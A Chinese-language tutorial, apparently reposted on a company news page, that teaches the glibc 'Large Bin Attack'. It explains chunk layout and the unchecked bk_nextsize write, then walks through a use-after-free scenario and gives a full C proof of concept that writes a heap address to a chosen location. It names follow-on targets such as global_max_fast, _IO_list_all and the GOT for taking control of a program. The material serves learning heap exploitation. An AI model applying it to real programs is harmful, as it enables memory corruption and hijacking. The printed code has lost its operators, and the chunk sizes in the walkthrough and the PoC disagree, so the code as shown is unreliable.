首页/新闻资讯/正文详情

Large Bin Attack

发布时间:2026/9/24 17:52:19 来源:云帆数科 栏目:资讯中心
Large Bin Attack
学习 Large Bin Attack最重要的一点是不要被它的名字吓倒。虽然它属于高级的堆利用技巧但它的本质其实非常简单利用 glibc 在维护“有序双向链表”时缺乏足够的安全检查从而让我们能在一个任意的内存地址里写入一个堆地址。我们先抛开复杂的代码从 Large Bin 这个“仓库”的特殊结构说起。第一步理解 Large Bin 的特殊结构在你之前接触的 Fastbin 或 Unsorted Bin 中一个释放的内存块Chunk只有两个指针fd指向下一个块和bk指向上一个块。它们构成的是普通链表。但是Large Bin 存放的是大于 1024 字节64位系统下的大内存块。为了在分配时能快速找到合适大小的块glibc 对 Large Bin 做了两件事按大小排序最大的 Chunk 放在链表头最小的放在链表尾。增加了两个指针为了加快搜索速度相同大小的 Chunk 会被归为一组。每组的第一个 Chunk除了有fd和bk还多了两个指针fd_nextsize和bk_nextsize。一个完整的 Large Bin Chunk 结构长这样struct malloc_chunk { INTERNAL_SIZE_T mchunk_prev_size; // 前一个chunk的大小 INTERNAL_SIZE_T mchunk_size; // 当前chunk的大小 struct malloc_chunk* fd; // 物理相邻的下一个chunk struct malloc_chunk* bk; // 物理相邻的上一个chunk // 只有 Large Bin 才用到的两个指针 struct malloc_chunk* fd_nextsize; // 指向比当前组稍微小一点的那个组的首个chunk struct malloc_chunk* bk_nextsize; // 指向比当前组稍微大一点的那个组的首个chunk };关键点fd_nextsize和bk_nextsize构成了一个跳表用来在不同大小的 Chunk 之间快速跳转。Large Bin Attack 的核心就是伪造bk_nextsize或bk指针。第二步攻击的触发原理解剖 glibc 源码什么时候会触发 Large Bin Attack答案是当一个 Chunk 从 Unsorted Bin 被放入 Large Bin 时。当你调用malloc申请内存时glibc 会遍历 Unsorted Bin。如果发现里面的 Chunk 大小不满足你的要求就会把它“分类”放到对应的 Bin 中。如果这个 Chunk 很大就会被塞进 Large Bin并且按照大小插入到合适的位置。在 glibc 源码中插入 Large Bin 的操作有这样一段逻辑这里简化了代码只保留致命部分假设victim是我们正要插入的 Chunkfwd是链表中已经存在的、大小比victim大的 Chunk。// 1. 设置 victim 的 nextsize 指针 victim-fd_nextsize fwd; victim-bk_nextsize fwd-bk_nextsize; // 2. 更新原有链表的 nextsize 指针 fwd-bk_nextsize victim; victim-bk_nextsize-fd_nextsize victim; // ---- 【致命漏洞就在这里】**仔细看最后一行代码victim-bk_nextsize-fd_nextsize victim;**如果你能利用某种漏洞比如 Use-After-FreeUAF在victim被插入前修改了原本躺在 Large Bin 里的那个fwd的bk_nextsize指针会发生什么假设我们把fwd-bk_nextsize篡改成Target_Address - 0x20根据代码第一段victim-bk_nextsize变成了Target_Address - 0x20。运行到最后一行时glibc 实际上执行的是(Target_Address - 0x20)-fd_nextsize victim在 Chunk 结构中fd_nextsize的偏移量刚好是0x20。于是代码就变成了Target_Address victim恭喜你成功地在Target_Address这个任意地址写入了victim的堆地址这就是 Large Bin Attack 的终极奥义。第三步手把手实战推演我们用一个具体的场景来走一遍攻击流程。假设现在你有一个 UAF 漏洞可以修改已经被释放的 Chunk 的内容。环境准备你需要伪造出一种特定的堆布局。malloc(0x400)得到 Chunk A。malloc(0x20)得到 Chunk 隔离防止与后面的合并。malloc(0x420)得到 Chunk B 比 A 稍微大一点。malloc(0x20)得到 Chunk 隔离。攻击步骤把 B 放入 Large Bin释放 B进入 Unsorted Bin。然后申请一个比 B 还大的块比如malloc(0x500)。这时glibc 发现 Unsorted Bin 里的 B 不够大就会把它转移到 Large Bin 中。此时Large Bin[ Chunk B ]释放 A 并利用 UAF 篡改 B释放 AA 会进入 Unsorted Bin。关键动作利用你的 UAF 漏洞修改躺在 Large Bin 里的Chunk B 的bk_nextsize指针将其覆盖为你想要攻击的目标地址减去 0x20即Target_Address - 0x20。触发漏洞将 A 插入 Large Bin再次申请一个极大的块比如malloc(0x500)。glibc 发现 Unsorted Bin 里的 A 也不够大于是也要把 A 转移到 Large Bin 里。glibc 开始排序发现 A (0x400) 比 B (0x420) 小决定把 A 插入到 B 的后面。漏洞爆发glibc 乖乖地执行我们上面提到的那段致命代码A-bk_nextsize-fd_nextsize A也就是Target_Address A的堆地址第四步我们能用它来做什么你可能会问“我费了半天劲只能往任意地址写入一个堆的地址又不能写我自定义的数据比如 system 函数这有什么用”这正是 Large Bin Attack 的精妙之处。它通常不作为最后的绝杀而是作为破局的跳板。最经典的用法是劫持global_max_fast变量global_max_fast是 glibc 中的一个全局变量用来限制 Fastbin 的最大尺寸默认通常是 0x80。你可以把Target_Address设为global_max_fast。攻击完成后global_max_fast会被覆盖成一个巨大的堆地址比如0x55xxxxxx。从此之后任何大小的 Chunk 释放后都会被当作 Fastbin 处理然后你就可以愉快地使用非常简单的 Fastbin Attack 来申请任意内存、修改 Got 表、拿到 Shell 了。例子这是一段经典的 C 语言概念验证代码PoC。通过这段代码你可以直观地看到我们是如何利用 UAFUse-After-Free漏洞将一个堆地址写入栈上的局部变量target中的。#include stdio.h #include stdlib.h int main() { // 我们的攻击目标将一个堆地址写入这个普通的局部变量中 size_t target 0; printf(攻击前 target 的值: 0x%zx\n, target); printf(target 变量的内存地址: %p\n, target); // // 第一步布局堆内存 // // 分配一个较大的 Chunk A (0x420) size_t *p1 malloc(0x420); // 分配一个隔离块防止 Chunk A 和 Chunk B 在释放时物理合并 malloc(0x20); // 分配一个稍小的 Chunk B (0x400) size_t *p2 malloc(0x400); // 再次分配隔离块防止 Chunk B 与 Top Chunk 合并 malloc(0x20); // // 第二步将 Chunk A 送入 Large Bin // free(p1); // p1 释放后首先进入 Unsorted Bin malloc(0x500); // 申请一个更大的块。glibc 遍历 Unsorted Bin 发现 p1 不够大 // 于是将其归类放入 Large Bin。 // // 第三步释放 Chunk B准备触发漏洞 // free(p2); // p2 释放后进入 Unsorted Bin // // 第四步漏洞介入利用 UAF 篡改指针 // // 假设程序存在 UAF 漏洞允许我们修改已经释放且躺在 Large Bin 里的 p1 // malloc 返回的用户态指针其索引偏移如下 // p1[0] - fd // p1[1] - bk // p1[2] - fd_nextsize // p1[3] - bk_nextsize // 我们将 p1 的 bk_nextsize 篡改为 target 地址减去 0x20 p1[3] (size_t)target - 0x20; // // 第五步引爆漏洞 // // 再次申请大内存。glibc 遍历 Unsorted Bin发现 p2 也不够大。 // 它试图将 p2 插入到 Large Bin 中 p1 的后面。 // 此时触发致命逻辑p1-bk_nextsize-fd_nextsize p2 // 翻译过来就是(target - 0x20 0x20) p2 的 Chunk 头地址 malloc(0x500); // // 验证结果 // printf(\n攻击后 target 的值: 0x%zx\n, target); // 计算 p2 的 Chunk 头地址 (用户态指针减去 0x10 的头部大小) printf(p2 Chunk 头的真实地址: %p\n, (void*)((char*)p2 - 0x10)); return 0; }核心偏移量解剖为什么是- 0x20在 64 位系统中内存对齐和结构体大小是固定的。这里是新手最容易卡住的地方我们拆解一下 glibc 计算地址的过程Chunk 头部的物理结构prev_size(8 bytes偏移 0x00)size(8 bytes偏移 0x08)fd(8 bytes偏移 0x10)bk(8 bytes偏移 0x18)fd_nextsize(8 bytes偏移0x20)bk_nextsize(8 bytes偏移 0x28)glibc 的执行视角当 glibc 执行到victim-bk_nextsize-fd_nextsize victim;时它在底层其实做的是指针加法计算。它读取了你伪造的bk_nextsize的地址然后强制往后偏移 0x20 个字节也就是fd_nextsize所在的位置把victim也就是 p2的地址写进去。你的攻击视角你希望victim的地址精准落入target变量中。如果你直接写p1[3] targetglibc 会把地址写到target 0x20的地方这就写偏了。所以你要提前减去 0x20补偿这个偏移p1[3] target - 0x20。这样 glibc 的操作就变成了(target - 0x20) 0x20 target。终端运行效果预期编译并运行这段代码你会看到类似如下的输出由于 ASLR每次运行地址会变但相对逻辑是不变的攻击前 target 的值: 0x0 target 变量的内存地址: 0x7ffd5a98b2c8 攻击后 target 的值: 0x55982c7a06a0 p2 Chunk 头的真实地址: 0x55982c7a06a0可以看到target原本是一个毫无威胁的0但在经过一次合法的malloc(0x500)操作后它被 glibc 内部的链表维护机制强行写入了p2的堆地址。如果在实际的漏洞挖掘中你将target替换为global_max_fast或者_IO_list_all等关键的系统底层变量就正式掌控了程序的执行流。

相关推荐

高远-万能AI审核助手:把 ASPICE、SQE 与自定义审核串成可回查的证据链
高远-万能AI审核助手:把 ASPICE、SQE 与自定义审核串成可回查的证据链

审核的可信,不在于结论写得快,而在于每一条结论都找得到来处。标准文件、项目资料、人工记录和报告模板,在传统审核里往往分散在不同地方:审核员要先找证据,再对照要求,接着填写判断,最后把结果… · 2026/9/24 17:52:06

STM32硬件I2C驱动MPU6050:BUSY卡死根因排查、软件恢复机制与实测验证
STM32硬件I2C驱动MPU6050:BUSY卡死根因排查、软件恢复机制与实测验证

文章目录 摘要 前言 一、BUSY 标志为什么会卡死:从寄存器说起 1.1 总线数据流与 BUSY 位的本质 1.2 两类根因:从机拉死 SDA 与滤波器误置位 1.3 一次 burst 读的完整时序 1.4 方案级决策:为什么坚持硬件 I2C 二、硬件设计与上拉电阻选型 2.1 接线定义 2.2 上拉电阻:不是随手… · 2026/9/24 17:52:06

数据库原理及运用(初识)第五节:#外键与外键约束
数据库原理及运用(初识)第五节:#外键与外键约束

欢迎回来!本篇文章为不了解数据库,或者将要学数据库却不知道它具体是什么的伙伴们介绍数据库的基础知识,同时小编也会用每一小节学到的新知识,一步一步搭建出一个完整的大一新生数据库系统,小编争取每天都会更新一节&a… · 2026/9/24 17:52:06

PyTorch CNN手写数字识别:从MNIST训练到Tkinter GUI部署
PyTorch CNN手写数字识别:从MNIST训练到Tkinter GUI部署

简介:面向计算机专业学生,提供一份基于卷积神经网络在MNIST数据集上实现手写数字识别的Python源码项目,附带GUI交互界面,适合作为毕业设计、课程设计或深度学习入门的实战参考。整个压缩包共23个项目文件,体积仅3.53MB… · 2026/9/24 18:24:10

.NET直播流媒体服务器Berry.Live实战:从部署到调优
.NET直播流媒体服务器Berry.Live实战:从部署到调优

做直播服务端选型这件事,我前前后后折腾过不少方案。从最早用Nginx加RTMP模块自己拼,到后来上SRS,再到换Go写的轻量服务,每个方案都有让人挠头的地方。最近一段时间我一直在用Berry.Live这套基于.NET的直播流媒体服务器&#xff0… · 2026/9/24 18:24:10

本地AI应用的三大安全边界:SQLite、Tauri IPC与FastAPI环回风险
本地AI应用的三大安全边界:SQLite、Tauri IPC与FastAPI环回风险

1. 为什么“本地运行”不等于“绝对安全”:从VoiceStudio的架构真相说起 很多人看到“本地语音AI”四个字,第一反应就是:数据不出设备、没联网、肯定零风险。我去年在给一家医疗语音录入系统做安全审计时,也这么想——直到我们用T… · 2026/9/24 18:24:10

云计算技术人变现指南:12条可落地的副业与创业路径
云计算技术人变现指南:12条可落地的副业与创业路径

最近总有人在社群里问我同一个问题:做云计算这行,技术学了不少、项目也做了不少,但感觉收入天花板就在那,除了跳槽涨薪,还有没有别的路子?我直接说结论:云计算技术人的变现路径,远比… · 2026/9/24 18:24:10

Java在线教育平台6.2源码解析与部署实战:从跑通到二次开发避坑指南
Java在线教育平台6.2源码解析与部署实战:从跑通到二次开发避坑指南

简介:基于Java技术的在线教育平台6.2版本设计源码是一套面向教育行业开发者与学习者的完整工程,适用于在线课程管理、视频教学、在线考试、作业提交等业务场景,能够帮助理解微服务与数据仓库相结合的后端架构实现。压缩包共69个文件&#xff… · 2026/9/24 18:24:10

VSCode 高效配置指南:从环境搭建到远程开发与 AI 编程
VSCode 高效配置指南:从环境搭建到远程开发与 AI 编程

最近后台好多朋友都在问 VSCode 的玩法,从最基础的安装汉化,到配 C/C、Python,再到 Git、SVN、远程 SSH,还有一批追新的人开始折腾 Codex、OpenCode、DeepSeek 这类 AI 插件。我干脆把这一年多来实际用 VSCode 干活时沉淀下来的操… · 2026/9/24 18:24:04

基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程
基于YOLOv8的渔船作业监控系统:从环境搭建到边缘部署全流程

简介:这是一套面向计算机、人工智能、自动化等专业学生与教师的毕业设计级项目资源,围绕YOLOv8实现渔船作业监控系统,可用于毕设、课程设计、大作业或项目立项演示。压缩包共97个文件,约24.21MB,以70个Python源码文件为… · 2026/9/24 0:00:13

1D-CNN时间序列建模实战:从Conv1d原理到工业落地
1D-CNN时间序列建模实战:从Conv1d原理到工业落地

简介:面向时间序列数据建模的一维卷积神经网络完整实现,适合深度学习入门者及需要快速验证时序模型的研究者,能够从音频、文本、传感器或股价等序列中挖掘局部特征与时间依赖。压缩包体积很小,只有3KB,内含3个Python脚… · 2026/9/24 0:00:26

柔软的L:汉语语流中被忽视的舌肌张力控制
柔软的L:汉语语流中被忽视的舌肌张力控制

1. 这个“L”不是字母表里的L,而是舌尖上的L最近在几个方言群和语音教学社群里,反复看到有人发一句:“也说字母L:柔软的长舌”。初看以为是英语发音课笔记,点开才发现全是方言爱好者、播音系学生、语言康复师甚至戏曲演… · 2026/9/24 0:00:44

了解更多?预约专属演示

我们的顾问将为您一对一讲解产品与方案

企业微信二维码